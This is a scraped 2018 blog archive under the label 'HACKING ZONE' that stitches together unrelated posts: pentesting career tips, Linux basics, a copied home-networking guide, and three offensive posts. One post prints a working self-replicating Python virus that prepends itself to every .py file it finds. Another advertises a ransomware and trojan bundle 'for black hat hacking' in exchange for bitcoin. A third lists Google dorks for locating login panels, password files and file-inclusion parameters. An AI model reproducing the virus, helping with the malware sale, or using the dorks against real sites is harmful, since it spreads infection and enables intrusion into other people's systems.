Follow Us @soratemplates

Showing posts with label HACKING ZONE. Show all posts
Showing posts with label HACKING ZONE. Show all posts

Friday, April 13, 2018

HACKING ZONE : 10 Common Mistakes of New / Aspiring Hackers, Pentesters

April 13, 2018 0 Comments
Hackers Pentesters who are new and aspiring to be good one often make few very common mistakes, here I am sharing them so they may take a note of these.
Only reading books
Don’t get us wrong, books are great. The problem is that a lot of people focus on reading books instead of gaining real hands-on experience. You can’t read about a bug class and expect to know about it. You need to see how the server responds, what happens if you try different payloads, how to debug your payloads. This is the only way to progress and to gain a real understanding of security issues.
Read books, but use them as an introduction to something you want to learn.
Kali everything
Another very surprising misconception is that you need this kind of magic “ HACKING COMPUTER” to perform pentesting/ hacking . And you need to attack with your Kali system (directly or in a VM).
Kali is an extraordinaire potpourri of pentesting tools and is very handy when you get started with some tools that can be hard to
install (especially Wifi drivers). However, you will probably be a lot more comfortable and efficient using your everyday OS and not be jumping from your system to your “ hacking VM” all the time. Especially if you are doing or learning web testing, you probably rarely need to use Kali. It’s also not always a good idea to run Kali as your main system as you will probably need to run other tools (productivity tools) that may be harder to get working on it (as opposed to a boring standard Linux distribution).
An error means it didn’t work
We get a lot of questions around payloads that didn’t work even if it did (visible thanks to our scoring system). Getting HTTP 500 errors doesn’t mean you didn’t successfully exploit the bug. Shellshock and a lot of serialization issues are a common example of bugs for which you will get code execution followed by a HTTP 500 error since the payload will trigger an unexpected behavior .
“How can I make sure it’s not vulnerable”
When doing a blackbox test, aspiring/young pentesters always want to make sure a system is not vulnerable (“How do I know I didn’t miss something). The truth is that you can never be 100% sure that a system is not vulnerable during a blackbox test. You will just make sure you run out of test cases to check if it was.
Spending too much time learning reversing/exploit writing instead of assessing systems, mobile , and web
Reversing and writing exploits are amazing things to do and you should definitely look into these two domains. However, if you want to break into infosec and score your first job, you need to be good at web (and mobile and network to a lesser extent) security. Most pentesting companies have a lot of their workload composed of web testing and this is not going to change in the next few months. Furthermore, they also have seniors people who are dying to do more research and will probably have priority on all the reversing/exploit writing jobs. So if you want to increase your likelihood of getting hired, you need to become a gun at web pentesting.
The same thing applies to Bug Bounty, only a few bounties require people to do reversing, most of them are web or mobile based.
And if you want to learn web security, no better place than PentesterLab
Reading a lot of security news without going in depth
This one is actually for a lot of people. When you read security news, try to go in depth on at least one subject. If you read a CVE:
Try to get a diff of the fix
Try to exploit the issue
Try to understand the root cause
See if you can find a bug bounty program running the same application or with a similar issue.
Doing that once a week goes a long way.
The same applies to conferences! After a conference, try to pick one talk and reproduce it.
Spending too much time building the perfect lab/laptop/…
Don’t waste time getting your perfect setup with a full network and multiple ESX servers as well as the perfect laptop. Just get started. It’s always easy to procrastinate and push back on what really matters. Don’t stay in your comfort zone. Just get started, start learning/ hacking even if you don’t have the perfect setup. Truth is, there is no perfect setup and your needs will evolve over time with your work and research.
Not writing code/ script
Like you should expect a developer to know some security’s basics in 2018, you should expect a security engineers/pentesters to be able to write simple programs/ script s to perform basic tasks. As a tester, you need to automate stuff all the time. You need to be able to write a small script:
Write a small TCP client without too much search
Parse a CSV file to extract a column without any Google search
Send HTTP requests based on a previous script (for example)
Write a decent size tool (as in more than 1k loc).
How to use regular expression

Not reading code
To become a better tester, you need to read code. As a (web) pentester, half of your job is to understand what the source code on the server side looks like (for the client side, you often get the code). Guess what… reading a lot of code helps tremendously with that! You will also learn what mistakes people usually make. You can also read the code of your favorite tools to get a better understanding of their inner working as well as their limitations.
Learning 20 programming languages
It’s a common mistake to try to learn too many programming languages as well. Don’t get me wrong it’s a good idea to know a lot of them and their differences (especially to write web shell and for CTF). But before doing that, you need to learn at least one language pretty well.
For example, you need to know:
How to disable/enable certificate verification in this language
Common mistakes you can make that introduces vulnerabilities
Good resources about this language
How to quickly patch some code to make something work
You should also understand (and be able to write) common programming patterns like:
Running code in parallel (thread/fork/…)
Publishing/consuming to a queue
TCP and UDP client and server
Reading data from STDIN.
Once you grasp harder concepts in one language, you will get a better understanding of common patterns and mistakes (vulnerabilities?) associated with those. This will help you find more bugs.
Finally, once you know one language well enough you can learn another one just by comparing it to the one you already know.
Conclusion
Hopefully, this list helped you a bit and you will avoid falling for some of these mistakes. The most important is to remember:
What Do You Think on This ? Say Here PRACTICE MAKES PERFECT

HACKING ZONE : Operating Systems – Linux – Basics

April 13, 2018 0 Comments
When learning about information security, software development, computer science or “insert other relevant topic here” it is likely that you will come up against a variety of different operating system s. Most new folks to this area will be primarily windows users and as a result will have had little or no exposure to the world of Linux . Or you might be on the other side of the fence, having grown up with *nix by your side the world of windows is an alien planet to you. You might also fall into the Mac camp, having grown up with macs, you’re used to things looking pretty, but have you ever tinkered with what goes on under the hood in the OS?
Do not worry if you fall into either of these three! We’ve all been at the same point one way or another, this next post will explain in depth some of the operating system s you might come across and it will also show you example scenar ios .
1. Linux
2. Windows (Coming Soon)
3. Mac OSX (Coming Soon)
linux“> Linux
Linux is one of the most commonly used operating system s in servers & web applications to date. In 2015, Linux & Unix-like
operating system s made up 98% of the servers on the Internet. From this statistic alone it can be seen that it’s likely to be popular for a reason?
When learning about Linux , if it’s new to you and you’ve come from a mainly windows background, you’ll be used to using a graphical user interface(GUI).
While Linux has a large variety of GUIs, it excels most with it’s use of the Terminal. The command-line interface, sometimes referred to as the CLI or terminal, is a tool into which you can type text commands to perform specific tasks in contrast to the mouse’s pointing and clicking on menus and buttons. You may have come across the command line within windows before(cmd.exe). If this is something you’ve never come across you’re still probably scratching your head thinking:
What the heck is a terminal or command line?
Allow me to explain some more, since you can directly control the computer by typing, many tasks can be performed more quickly. As a result of this, some tasks can be automated with special commands that loop through and perform the same action on many files saving you, potentially, loads of time in the process.
The application or user interface that accepts your typed responses and displays the data on the screen is called a shell, and there are many different varieties that you can choose from, but the most common these days is the Bash shell, which is the default on Linux and Mac systems in the Terminal application.
Getting started with the command line interface
A lot of the folk I’ve spoken to have been really interested in command line but haven’t really known where to get started. I’d usually say just fire up Linux and play. However for some people this might be a mentally difficult task, for those of you who want a little hand on your way, I suggest you take a Command Line Crash Course on Code Academy.
For those of you who are as far as knowing the basics, I suggest you start to look at bash scripting to enable you to do things. The most simple bash script would be a hello world application as shown in the code below:
Open this in a text editor such as nano, vim, leafpad(if you prefer a GUI) and save as myscript.sh. Now some of you will see the above code and think WHAT EVEN IS THAT, I DON’T UNDERSTAND, HEEEELLLLLPPPPPPP. And others might see it and think I sort of know what that does but tell me more. Don’t worry if you’re either of these two situations, I’m about to explain what it does, what else you can do.
For the first camp of people who see the code and are running about confused and crying. Do not worry, it’s going to be alright. Firstly explaining that the lines of code do, the first line #!/bin/
bash explains the environment that the script is running which is the shell environment in linux = bash . The next line is a simple print Hello World on screen.
Now this may be too simple for some of you, for those of you who want to get more out of things, pick a project and write it in
bash , check out http://www.commandlinefu.com/ for tips and
tricks of things to do. If you’re stuck for ideas, check out my Github scripts.
This should be enough to get you started on linux , there will be a future more in depth writeup on advanced topics to check out. Onwards!

HACKING ZONE : simple way to make antivirus using Python

April 13, 2018 2 Comments
Python Virus !! Lets code a simple Virus easily in Python, Python, as you know, is widely used by Hackers to code different scripts to ease their task, Now let us Make a Virus in Python.
This simple Python Script when executed searches for Python files and makes the strings in the file to the following – “EthicalHackx is Watching YOU”.
NOTE: This is just for EDUCATIONAL Purpose and run in Safe Environment ( Virtual Box)
What Do You Think on This ? Say Here a Facebook d Twitter f Google+
J WhatsApp 1
How To Find IP & MAC Addresses on Network How to Use X-XSS-Protection for Evil Run Kali Linux on Windows 10 – Download From Windows Store
Information Gathering : First Step to Hacking Xnspy: The iPhone 7 Spying App Review Loopholes in Aadhaar authentication API services RELATED ARTICLES MORE FROM AUTHOR
Beginner Hacking CROSS SITE SCR... Hacking Tools &...
Beginner Hacking Hacking Software Hacking Tutorials
  1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39 #!/usr/bin/python
import os
import datetime
SIGNATURE = "SIMPLE PYTHON VIRUS"
def search ( path ):
filestoinfect = []
filelist = os. listdir( path )
for fname in filelist :
if os.path . isdir ( path + "/" + fname ):
filestoinfect . extend ( search ( path + "/" + fname))
elif fname [ - 3 :] == ".py" :
infected = False
for line in open ( path + "/" +fname ) :
if SIGNATURE in line :
infected = True
break
if infected == False :
filestoinfect . append ( path +"/" + fname )
return filestoinfect
def infect ( filestoinfect ):
virus = open ( os.path . abspath ( __file__ ))
virusstring = ""
for i ,line in enumerate ( virus ) :
if i & gt ; = 0 and i & lt ; 39 :
virusstring += line
virus . close
for fname in filestoinfect :
f = open ( fname )
temp = f . read ()
f . close ()
f = open ( fname ,"w" )
f . write( virusstring + temp )
f . close ()
def bomb () :
if datetime . datetime . now (). month == 1 and datetime . d
print "EthicalHackx is Watching YOU"
filestoinfect = search ( os.path . abspath ( "" ))
infect ( filestoinfect )
bomb ()

Wednesday, April 4, 2018

Hacking zone : how to create you network

April 04, 2018 0 Comments

Lifewire







Internet & Network

    Key Concepts
    Basics
    Guides & Tutorials
    Installing & Upgrading
    Tips & Tricks
    What Are Bitcoins?

    How To
        Windows
        Macs
        iPad
        iPhone
        Android
        Internet & Network
        Digital Cameras
        Home Theater
        Email & Messaging
    Fix
        Windows
        Macs
        iPad
        iPhone
        Internet & Network
        Digital Cameras
        Home Theater
        Getting More Help
    Buy
        Buying Guides
        Product Reviews
        Software & Apps
    Do More
        Web & Search
        Social Media
        Gaming
        New & Next

How To › Internet & Network
Home Computer Networks 101
Guide to Wired and Wireless Home Networking

    Share
    Pin
    Email

Man looking at a woman working on a laptop
ONOKY - Eric Audras/Brand X Pictures/Getty Images
by Bradley Mitchell
Updated February 06, 2018

This page serves as your starting point for learning about the world of home computer networking, step by step. We will teach you all of the basics of home network planning, installation, and troubleshooting assuming no prior knowledge of network technology.
Background

Computer networks have existed for more than thirty years, but only relatively recently have they become popular in homes. In 1999, only a few hundred thousand households in the United States possessed a home network, although many more "expressed interest" in having one.

Today, many millions of households in the U.S. and worldwide have adopted home computer networking. Millions more have yet to build their first home network. Even those who've previously taken the plunge are now beginning to revamp their networks for wireless - the current wave of useful technology for home networking.

Depending on your present goals and past experience, varying types of information may be relevant to your situation. Use the outline below as a comprehensive guide to your personal research.
Do I Really Need a Home Computer Network?

Some of you likely share files between your computers using floppy disks or USB keys. A home network allows you to share these files much faster and more conveniently by utilizing the available connections between computers. Home networks allow sharing of other things, too, like a printer and an Internet connection. Finally, home networks create the possibility to use new applications like multi-player online games.
Home Networking Outline

    1. Benefits of Home Networking
        A. What Is Computer Networking?
        B. What Is Wireless Networking?

    2. Planning a New Home Network
        A. Home Networking Diagrams
        B. Wired vs Wireless Home Networks
        C. What Hardware Is Required to Build a Wireless Home Network?

    3. Building the Home Network
        A. Connecting Two Computers for File Sharing
        B. Network Router Setup Guide
        C. How to Build a Wireless Home Network Tutorial
        D. 10 Most Common Home Networking Problems to Avoid

    4. Setting Up Home Internet Access
        A. Internet Connection Alternatives for Home Networks

    5. Expanding / Improving Your Home Network
        A. Tips for Improving a Wireless Home Network
        B. Networking Consumer Electronics
        C. Internet Remote Access Software

    6. Troubleshooting Home Networks
        A. Tips for Dealing With Dropped Wireless Network Connections
        B. Tips for Troubleshooting Windows File and Printer Sharing
        C. Tips for Improving Wireless Network Security

Next > Planning a New Home Network

Before purchasing and installing equipment, determine your needs. The location of your computer(s), printer(s) and other devices you want to connect can affect your network design. Some systems may already contain built-in networking capability while others may not.

Those devices that need network capability added, probably support only certain kinds of network gear. Take care to buy compatible gear.
Is Your Inbox Out of Control?
Believe it or not, our free, daily newsletter can help you use tech better and declutter your inbox. Sign up now!
One-Tap Sign Up

If you desire shared Internet access, be sure to factor this into your design. Other important factors in network design include reach and speed.

Finally, consider both present and future needs in your plan. How many computers will your network have in the next year or two? A network with just two computers can involve a very different design than a network with five, for example.

Use our interactive network advisor tool to walk you through the factors to consider when designing your home network:

    Home Network Advisor

Read More -

    Basic Home Networking Diagrams
    Connecting Two Computers For Basic Networking
    What Is the Difference Between a Router and Hub or Switch?
    What Hardware Is Required To Build a Wireless Network

Wired vs Wireless Networking
The home networker can choose from either wireless or wired designs. Wireless networks provide more mobility to a person in and around their home, and they make especially good sense for laptop networking. Networks with wires or cables, on the other hand, usually cost less than wireless, may perform faster and more reliably, and make good sense for desktop networking. Choosing between wired and wireless options can be difficult, but making an informed decision here can save money and increase one's overall satisfaction with their home network.

Read More -

    What Is Wireless Networking?
    Why Build a Wireless Home Network?
    Wired vs Wireless - Building the Right Home Network

Next > Purchasing Home Network Equipment

With a suitable design chosen, you are ready to acquire the equipment needed to build the home network. Several forms of network hardware exist, each serving a specialized purpose.

    Which WiFi Standard Is Best?
    Visual Tour of Wireless Network Gear
    Introduction to Network Adapters
    Wireless Adapter Cards - Wireless Network Adapters
    Introduction to Wired Network Hubs

Most home network designs have as their foundation a centerpiece device such as a router. Use our interactive router advisor tool to walk you through the selection of a suitable network router:

    Home Network Router Advisor

Read More -

    Wireless Router Buying Guide
    Buying a Home Broadband Router

Next > Assembling the Home Network

Now that you have the needed equipment, assembling the home network should be straightforward. However, the exact details will vary depending on the network's design. In particular, wireless network connections involve different installation methods than wired ones.

As a general rule, its best to set up the network centerpiece first (if any), then configure each of the computers and other devices to join the network one at a time.

Read More -

    Wireless Home Network Tutorial
    Do Wireless Networks Support Both WiFi and Ethernet Connections?
    Choosing Computer Names on a Windows Home Network
    Choosing Workgroup / Domain Names on a Windows Home Network

Next > Using Your Home Network
Common Home Networking Problems to Avoid
Computer networks bring many good things into the home: more convenient Internet access, sharing of files and printers, additional home entertainment options, and so on. Yet home network technology also poses challenges. Many folks don't know where to start. Things often don't work right the first time. Sometimes, people settle for an inferior setup and never realize the full potential of their home network. The advice below helps you steer clear of these common problems.
Operating Systems and Home Networking
The network operating system (NOS) plays a key role on the home network. The operating system is the glue between your network gear and your applications.

Read more: About network operating systems
Home Internet Service
Although you do not need Internet (Net) access to benefit from a home network, a majority of home networkers want to share an Internet connection. Depending on where you live, several different form of Internet service might be available, including

    traditional modem dial-up
    ISDN
    DSL or cable modem broadband, and
    satellite Internet service

The choice of Internet service has ramifications for your home network planning.
Home Network Security
Hooking a home network to the Internet can be dangerous! If you can access information on the public Net, its very possible that people on the Net can access your information too. Fortunately, several different technologies are available to help you keep your home network relatively safe from attackers (often called "hackers"). Bottom line: security features should be installed and tested on everyone's home network.
Troubleshooting a Home Network
Installing a home network for the first time can be frustrating, but the frustration passes quickly once the basics have been understood and your system is running. A few months may pass without problems, but inevitably, nasty trouble with the network will appear at some point. Maybe the kids can't get to the Internet or their network game keeps crashing. Maybe file sharing suddenly stops working. Maybe everything stops working. A small amount of knowledge can go a long way in finding and fixing these problems quickly while keeping the family peace.
Advanced Home Networking
Have you always wanted to learn how to program computers, or build Web pages and a Web site? With a home network, these and other more advanced skills might be within your reach. There was a time in computer networking where much of the important technical information was kept in the heads of engineers and passed along through a kind of "oral tradition." Thankfully, we've matured in this field and now nearly anything about networking is accessible to people with patience and a willingness to learn. Your home network can function as a development environment for you to experiment and practice with technology.
The Future of Home Networking
The home networks we use today will look nothing like the networks of twenty years from now. From the computers we use to the applications we run, the future of home networking should be very exciting. Some people believe, thanks to an area of computer networking called home automation, our refrigerators and toasters will even become intelligent! Most importantly, perhaps someday every family that wants to own a home network will be able to do so. No doubt we will be proud to tell our grandchildren of our experiences in these "pioneer days" of home networking, and they will laugh at us accordingly.

Next page > Benefits of Home Networking > Page 3, 4, 5, 6, 7, 8
Was this page helpful?

    Home Solution & wifi Devices network

    Article
    What Gear is Needed for a Wireless Home Network?

    List
    Setting Up a Home Network
    A smartphone and a wireless network

    List
    What you need to know to set up home computer networks
    Girl Sitting In Bed With Laptop Drinking Coffee

    Article
    Wired vs Wireless Networking: How to Build a Local Area Network That's Right for You
    Woman working on laptop at home at night.

    Article
    How to Build a Home Network
    Home Office - Working at Home

    Article
    How to add a router to your home network
    Setting up our smart thermostat

    List
    Easy Tips and Fixes for Home Network Problems
    Networking Concept

    Article
    A look inside the wonderful world of wireless computer networking
    Girls on a playdate using mobile devices on home network.

    List
    Gallery of Home Network Diagrams
    Router

    Article
    What to Do When Your Home Network Router Isn't Working
    Linksys WMP54G Wireless PCI Adapter

    List
    An Easy Guide to Wireless Network Adapters and Wireless Adapter Cards
    Xfinity Home Gateway Login Page

    List
    Take some time to make your wireless home network more secure
    D-Link DFE-528TX Network Adapter

    Article
    Understanding computer network adapters (both wired and wireless)
    Man on home computer

    Article
    How to Set up Guest WiFi for Your Home
    Cloud computing

    Article
    Do You Know Why You Should Set up an Ad-Hoc Wireless Network?
    Linksys Network

    Article
    How to set up a Linksys home computer network

Lifewire







Is Your Inbox Out of Control?
Believe it or not, our free, daily newsletter can help you use tech better and declutter your inbox. Sign up

Monday, April 2, 2018

Hacking zone : malware virus

April 02, 2018 0 Comments
HELLO GUYS HERE IS A FULL LIST OF MALWARES, VIRUSES, RANSOMEWARES AND TROJANS FOR YOUR ETHICAL AND BLACK HAT HACKING.
You can purchase this bundle by sending   0.0044 btc to the bitcoin address 19WZ8j8j38mSjaWqUn4fRmmyhY1z5pEERR
after sending the bitcoin send your:
Name
Email Address
Transaction ID
Date of transaction to
darknett@yahoo.com

AndroRat_6Dec2013
Android.Skygofree
Android.Spy.49_iBanking_Feb2014
Android.VikingHorde    Viking Horde Android Botnet
Artemis
Backdoor.MSIL.Tyupkin
BlackEnergy2.1
Careto_Feb2014
CryptoLocker_10Sep2013
CryptoLocker_20Nov2013
CryptoLocker_22Jan2014
Dino Added Dino malware
Dropper.Taleret
Duqu2
Dyre Dyre & Romebrtik
EquationGroup.DoubleFantasy
EquationGroup.EquationDrug
EquationGroup.EquationLaser OSX XAgent - APT28
EquationGroup.Fanny
EquationGroup.GROK
EquationGroup.GrayFish
EquationGroup.TripleFantasy
EquationGroup OSX XAgent - APT28 11
FancyBear.GermanParliament
IllusionBot_May2007
KRBanker EngRat source & Fixed KRBanker pass
Kelihos Ulssm & Kelihos
Keylogger.Ardamax
Linux.Chapros.A
Linux.Encoder.1
Linux.Wirenet
LoveLetter LoveLetter Email-Worm
Net-Worm.Win32.Kido Kido/Conficker
Neurevt.1.7.0.1 Added Betabot, Asprox & Lephic
Nitlove Nitlove        POS malware
Nivdort
OSX.AdWare.MacSecurity Some OSX Malwares
OSX.Backdoor.iWorm iWorm
OSX.HellRaiser Some OSX Malwares
OSX.JacksBot    Some OSX Malwares
OSX.OceanLotus
OSX.Wirenet
OSX.XAgent OSX XAgent - APT28
PlugX
PotaoExpress
Poweliks
Proteus
Ransomware.Cerber Ransomware.Cerber
Ransomware.Cryptowall Code changes, Alina source, Cryptowall & Rustock
Ransomware.Jigsaw Jigsaw & Athena
Ransomware.Locky Locky Ransomware
Ransomware.Mamba Mamba/HDDCryptor Ransomware
Ransomware.Matsnu
Ransomware.Petrwrap Petwrap/Pety
Ransomware.Petya Petya ransomware
Ransomware.Radamant Radamant & Vipasana Ransomware
Ransomware.Rex Rex Drupal Ransomware
Ransomware.Satana Satana Ransomware
Ransomware.TeslaCrypt Waski & TeslaCrypt
Ransomware.Vipasana Radamant & Vipasana Ransomwares
Ransomware.WannaCry WannaCry Ransomware
Ransomware.WannaCry_Plus Skygofree, Wannacry, AgentTesla
Rombertik Dyre & Romebrtik
Rustock Code changes, Alina source, Cryptowall & Rustock
Shamoon ZeroAccess & Shamoon
Skywiper-A.Flame
Somoto
SpyEye
Surtr
SymbOS.Lasco Some UI improvements and a Symbian worm
Trojan.AlienSpy
Trojan.Asprox
Trojan.Bladabindi
Trojan.Destover-Sony
Trojan.Dropper.Gen
Trojan.Kovter
Trojan.Loadmoney BlackHole ExploitKit, AryanRAT
Trojan.NSIS.Win32
Trojan.Regin
Trojan.Shylock.
Trojan.Sinowal
Trojan.Stabuniq
Trojan.Tapaoux
Trojan.Win32.Bechiro.BCD
TrojanWin32.Duqu.Stuxnet
Variant.Kazy
VolatileCedar.Explosion Fileless trojan WMIGhost & Volatile Cedar
WMIGhost Fileless trojan WMIGhost & Volatile Cedar
Waski.Upatre Waski & TeslaCrypt
Win32.APT28.SekoiaRootkit
Win32.APT32.Windshield
Win32.AgentTesla Skygofree, Wannacry, AgentTesla
Win32.Alina.3.4.B
Win32.Avatar
Win32.Boaxxe.BBp
Win32.Caphaw.Shylock
Win32.Carberp
Win32.Cridex
Win32.Cutwail Emotet & Cutwail
Win32.Emotet Emotet & Cutwail
Win32.Fareit
Win32.Hupigon
Win32.Infostealer.Dexter Updating to DB 092715032014 and inserting VIP column.
Win32.Invincea_Tunnel Some lions tigers and bears
Win32.Ixeshe
Win32.Lephic Added Betabot, Asprox & Lephic
Win32.Narilam Even more buddies, reached 100 malwares mark
Win32.OnionDuke.B Added Sony-Signed Destover, 0x88 and OnionDuke
Win32.Reveton.Y BlackHole ExploitKit, AryanRAT & more
Win32.Sality
Win32.Sofacy.A
Win32.Stuxnet.A.Duqu-C-Media
Win32.Stuxnet.B.Duqu-Realtek
Win32.Turla Some name fixing
Win32.Vobfus Even more buddies, reached 100
Win32.Zurgop
Win32Dircrypt.Trojan.Ransom.ABZ
ZeroAccess
ZeroLocker
ZeusBankingVersion_26Nov2013
ZeusGameove
ZeusVM
njRAT-v0.6.4

Hacking zone : Google Dork

April 02, 2018 3 Comments
What is Google Dork?

Techtarget says “A Google dork is an employee who unknowingly exposes sensitive corporate information on the Internet. The word dork is slang for a slow-witted or in-ept person.

Google dorks put corporate information at risk because they unwittingly create back doors that allow an attacker to enter a network without permission and/or gain access to unauthorized information. To locate sensitive information, attackers use advanced search strings called Google dork queries.”

Basically, it is a complex Google search string created using combination of advanced google search operators like site:, filetype:, inurl:, intitle:, intext:, etc. and possible vulnerable terms which when entered in Google search bar may list the sites with those vulnerabilities.

Doing Google Dorks queries, we put Google itself as a tool to find vulnerabilities, sensitive information of websites from what we call Google Hacking Database (GHDB).

Can Reveal

Don’t underestimate the power of Google search. It has most powerful web crawlers in the world, it provides lots of smart search operators and options to filter out only needed information. That’s what make Google Dorks powerful. If used correctly, it can help in finding :-

Footholds -Queries that can help a hacker gain a foothold into a web serverWeb Server Detection – These links demonstrate Google’s awesome ability to profile web servers.Files containing usernames – These files contain usernames, but no passwords… Still, google finding usernames on a web site.Sensitive Directories – Google’s collection of web sites sharing sensitive directories. The files contained in here will vary from sensitive to uber-secret!Vulnerable Files – HUNDREDS of vulnerable files that Google can find on websitesFiles containing passwords – PASSWORDS, for the LOVE OF GOD!!! Google found PASSWORDS!Vulnerable Servers – These searches reveal servers with specific vulnerabilities. These are found in a different way than the searches found in the “Vulnerable Files” section.Sensitive Online Shopping Info – Examples of queries that can reveal online shopping info like customer data, suppliers, orders, credit card numbers, credit card info, etc.Error Messages – Really retarded error messages that say WAY too much!Files containing juicy info – No usernames or passwords, but interesting stuff none the less.Network or vulnerability data – These pages contain such things as firewall logs, honeypot logs, network information, IDS logs… all sorts of fun stuff!Pages containing login portals – These are login pages for various services. Consider them the front door of a website’s more sensitive functions.Various Online Devices – This category contains things like printers, video cameras, and all sorts of cool things found on the web with Google.Advisories and Vulnerabilities – These searches locate vulnerable servers. These searches are often generated from various security advisory posts, and in many cases are product or version-specific.

Google Dorks Ultimate Search Queries

So, here I am sharing the list of 4500+ Google Dorks you can use for hacking purposes – finding vulnerabilities, sensitive information in websites or servers.

inurl:/general.php?*id=*
inurl:/careers-detail.asp?id=
inurl:/WhatNew.asp?page=&id=
inurl:/gallery.asp?cid=
inurl:/publications.asp?type=
inurl:/mpfn=pdview&id=
inurl:/reservations.php?id=
inurl:/list_blogs.php?sort_mode=
inurl:/eventdetails.php?*=
inurl:/commodities.php?*id=
inurl:/recipe-view.php?id=
inurl:product.php?mid=
inurl:view_ad.php?id=
inurl:/imprimir.php?id=
inurl:/prodotti.php?id=
inurl:index.cgi?aktion=shopview
inurl:/default.php?id=
inurl:/default.php?portalID=
inurl:/*.php?id=
inurl:/articles.php?id=
inurl:/os_view_full.php?
inurl:/Content.asp?id=
inurl:/CollectionContent.asp?id=
intitle:”Novell Web Services” “GroupWise” -inurl:”doc/11924″ -.mil -.edu -.gov -filetype:pdf
intitle:”Novell Web Services” intext:”Select a service and a language.”
intitle:”oMail-admin Administration – Login” -inurl:omnis.ch
intitle:”OnLine Recruitment Program – Login”
intitle:”Philex 0.2*” -s?ri?t -site:freelists.org
intitle:”PHP Advanced Transfer” inurl:”login.php”
intitle:”php icalendar administration” -site:sourceforge.net
intitle:”php icalendar administration” -site:sourceforge.net
intitle:”phpPgAdmin – Login” Language
intitle:”PHProjekt – login” login password
intitle:”please login” “your password is *”
intitle:”Remote Desktop Web Connection” inurl:tsweb
intitle:”SFXAdmin – sfx_global” | intitle:”SFXAdmin – sfx_local” | intitle:”SFXAdmin – sfx_test”
intitle:”SHOUTcast Administrator” inurl:admin.cgi
intitle:”site administration: please log in” “site designed by emarketsouth”
intitle:”Supero Doctor III” -inurl:supermicro
intitle:”SuSE Linux Openexchange Server” “Please activate Javas?ri?t!”
intitle:”teamspeak server-administration
intitle:”Tomcat Server Administration”
intitle:”TOPdesk ApplicationServer”
intitle:”TUTOS Login”
intitle:”TWIG Login”
intitle:”vhost” intext:”vHost . 2000-2004″
intitle:”Virtual Server Administration System”
intitle:”VisNetic WebMail” inurl:”/mail/”
intitle:”VitalQIP IP Management System”
intitle:”VMware Management Interface:” inurl:”vmware/en/”
intitle:”VNC viewer for Java”
intitle:”web-cyradm”|”by Luc de Louw” “This is only for authorized users” -tar.gz -site:web-cyradm.org
intitle:”WebLogic Server” intitle:”Console Login” inurl:console
intitle:”Welcome Site/User Administrator” “Please select the language” -demos
intitle:”Welcome to Mailtraq WebMail”
intitle:”welcome to netware *” -site:novell.com
intitle:”WorldClient” intext:”? (2003|2004) Alt-N Technologies.”
intitle:”xams 0.0.0..15 – Login”
intitle:”XcAuctionLite” | “DRIVEN BY XCENT” Lite inurl:admin
intitle:”XMail Web Administration Interface” intext:Login intext:password
intitle:”Zope Help System” inurl:HelpSys
intitle:”ZyXEL Prestige Router” “Enter password”
intitle:”inc. vpn 3000 concentrator”
intitle:(“TrackerCam Live Video”)|(“TrackerCam Application Login”)|(“Trackercam Remote”) -trackercam.com
intitle:asterisk.management.portal web-access
intitle:endymion.sak?.mail.login.page | inurl:sake.servlet
intitle:Group-Office “Enter your username and password to login”
intitle:ilohamail “
/modules/vwar/admin/admin.php?vwar_root=
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
/tools/send_reminders.php?includedir= allinurl:day.php?date=
/skin/zero_vote/error.php?dir=
/modules/TotalCalendar/about.php?inc_dir=
/login.php?dir=
/tags.php?BBCodeFile=
index.php?pageurl=
/templates/headline_temp.php?nst_inc=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/agendax/addevent.inc.php?agendax_path=
/include/main.php?config[search_disp]=true&include_dir=
/contrib/yabbse/poc.php?poc_root_path=
/phpopenchat/contrib/yabbse/poc.php?sourcedir=
/photoalb/lib/static/header.php?set_menu=
/squito/photolist.inc.php?photoroot=
/bz/squito/photolist.inc.php?photoroot=
/ppa/inc/functions.inc.php?config[ppa_root_path]=
/spid/lang/lang.php?lang_path=
/classes.php?LOCAL_PATH=
al_initialize.php?alpath=
/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
/extensions/moblog/moblog_lib.php?basedir=
/app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=
components/com_performs/performs.php?mosConfig_absolute_path=
modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/components/com_cpg/cpg.php?mosConfig_absolute_path=
administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=
inc/cmses/aedating4CMS.php?dir[inc]=
bp_ncom.php?bnrep=
/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=
/jscript.php?my_ms[root]=
/popup_window.php?site_isp_root=
/yabbse/Sources/Packages.php?sourcedir=
/include/main.php?config[search_disp]=true&include_dir=
/include/main.php?config[search_disp]=true&include_dir=
/includes/functions_portal.php?phpbb_root_path=
pagina.php?ir=
home.php?qry=
index2.php?choix=
page.php?addr=
index1.php?dir=
principal.php?pr=
press.php?seite=
standard.php?seccion=
page.php?goto=
head.php?cmd=
home.php?sec=
home.php?category=
standard.php?cmd=
mod*.php?thispage=
*.php?secc=
base.php?to=
index3.php?chapter=
start.php?seccion=
base.php?middlePart=
view.php?choix=
template.php?panel=
base.php?panel=
template.php?mod=
path.php?menue=
info.php?j=
blank.php?pref=
sub*.php?channel=
padrao.php?secc=
standard.php?in=
general.php?cmd=
pagina.php?panel=
*inc*.php?inc=
template.php?where=
general.php?id=
path.php?channel=
standard.php?pref=
template.php?play=
gallery.php?seccion=
layout.php?my=
page.php?tipo=
sitio.php?rub=
pagina.php?u=
file.php?ir=
*inc*.php?sivu=
padrao.php?seite=
press.php?i=
path.php?start=
mod*.php?tipo=
page.php?chapter=
home.php?recipe=
gallery.php?ref=
pagina.php?section=
home.php?menu=
default.php?basepath=
index2.php?open=
blank.php?pname=
sub*.php?modo=
index2.php?goto=
path.php?subject=
inurl:skin=
inurl:static=
inurl:str=
inurl:strona=
inurl:sub=
inurl:tresc=
inurl:url=
inurl:user=
inurl:ajax.php?page=

—Contain Sensitive Data———–
filetype:bak createobject sa
